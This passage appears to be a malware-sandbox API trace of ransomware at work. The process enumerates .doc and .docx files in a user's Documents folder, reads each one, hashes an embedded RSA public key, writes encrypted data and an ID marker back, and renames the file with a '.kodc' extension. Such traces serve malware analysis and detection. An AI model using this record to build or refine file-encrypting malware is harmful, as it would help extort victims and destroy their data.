hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bd68 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69ba50 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ad2c0 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c428 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa30 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3298d18 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3316db8 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69be70 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa18 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9d210 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b96968 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69bc60 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adf00 | out: hHeap=0x630000) returned 1 [0098.492] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cc1c0 | out: hHeap=0x630000) returned 1 [0098.493] WriteFile (in: hFile=0x5cc, lpBuffer=0x9ba4d90*, nNumberOfBytesToWrite=0x11bd9, lpNumberOfBytesWritten=0x9e2fb14, lpOverlapped=0x0 | out: lpBuffer=0x9ba4d90*, lpNumberOfBytesWritten=0x9e2fb14*=0x11bd9, lpOverlapped=0x0) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9ba4d90 | out: hHeap=0x630000) returned 1 [0098.493] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11bde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.493] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x333b018 [0098.493] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x333b018, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0098.493] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x333a888 [0098.493] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0098.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.494] WriteFile (in: hFile=0x5cc, lpBuffer=0x333a888*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333a888*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0098.494] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.494] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.494] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.494] CloseHandle (hObject=0x5cc) returned 1 [0098.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x32c2cb0 [0098.495] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x880) returned 0x32d0db8 [0098.495] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32c2cb0 | out: hHeap=0x630000) returned 1 [0098.495] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nnD-74w.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nnd-74w.doc"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\nnD-74w.doc.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nnd-74w.doc.kodc")) returned 1 [0098.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.496] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.496] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.497] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.497] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x918af0b0, ftCreationTime.dwHighDateTime=0x1d593a0, ftLastAccessTime.dwLowDateTime=0xb0b5c190, ftLastAccessTime.dwHighDateTime=0x1d5c2ad, ftLastWriteTime.dwLowDateTime=0xb0b5c190, ftLastWriteTime.dwHighDateTime=0x1d5c2ad, nFileSizeHigh=0x0, nFileSizeLow=0x11a23, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NY_oA qfnaFrBV.docx", cAlternateFileName="NY_OAQ~1.DOC")) returned 1 [0098.497] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce2d8 [0098.498] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0098.498] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce2d8 | out: hHeap=0x630000) returned 1 [0098.498] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NY_oA qfnaFrBV.docx") returned=".docx" [0098.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NY_oA qfnaFrBV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ny_oa qfnafrbv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.498] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=72227) returned 1 [0098.498] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.501] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x119fd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.501] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.502] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.502] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.502] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.502] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x11a23, lpOverlapped=0x0) returned 1 [0098.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.503] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.503] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.503] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x692d18) returned 1 [0098.504] CryptCreateHash (in: hProv=0x692d18, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0098.504] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0098.504] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0098.504] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0098.504] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0098.504] GetLastError () returned 0x0 [0098.505] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0098.505] CryptReleaseContext (hProv=0x692d18, dwFlags=0x0) returned 1 [0098.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0098.505] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0098.505] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0098.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.505] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0098.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0098.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11a20) returned 0x9ba4d90 [0098.505] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0098.505] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0098.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0098.505] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338ee8 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d210 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa18 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9d258 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa30 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa60 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331aa78 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0098.506] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32d0958 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x333a888 [0098.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0098.506] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333a888 | out: hHeap=0x630000) returned 1 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x331a538 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0098.506] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x331aa78 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x331aa60 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c770 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c428 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c770 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa78 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331aa60 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x331a538 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338ee8 | out: hHeap=0x630000) returned 1 [0098.507] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0958 | out: hHeap=0x630000) returned 1 [0098.507] GetCurrentThreadId () returned 0x42c [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9b8ef68 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x692d18 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0098.507] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0098.508] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x11a23, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.508] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0098.508] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0098.508] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0098.508] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0098.509] CloseHandle (hObject=0x5cc) returned 1 [0098.511] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NY_oA qfnaFrBV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ny_oa qfnafrbv.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\NY_oA qfnaFrBV.docx.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\ny_oa qfnafrbv.docx.kodc")) returned 1 [0098.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d0db8 | out: hHeap=0x630000) returned 1 [0098.512] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0098.512] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0098.513] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c0 | out: hHeap=0x630000) returned 1 [0098.513] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4dc5cd30, ftCreationTime.dwHighDateTime=0x1d5ba26, ftLastAccessTime.dwLowDateTime=0x6961cf10, ftLastAccessTime.dwHighDateTime=0x1d5c180, ftLastWriteTime.dwLowDateTime=0x6961cf10, ftLastWriteTime.dwHighDateTime=0x1d5c180, nFileSizeHigh=0x0, nFileSizeLow=0xfe20, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o1A33chNmPJo_UuE.doc", cAlternateFileName="O1A33C~1.DOC")) returned 1 [0098.513] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o1A33chNmPJo_UuE.doc") returned=".doc" [0098.513] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\o1A33chNmPJo_UuE.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\o1a33chnmpjo_uue.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0098.514] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=65056) returned 1 [0098.514] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0098.517] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xfdfa, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.517] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0098.518] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.518] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0xfe20, lpOverlapped=0x0) returned 1 [0098.518] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.519] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0098.519] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0098.519] lstrlenA (lpString="-----BEGIN PUBLIC 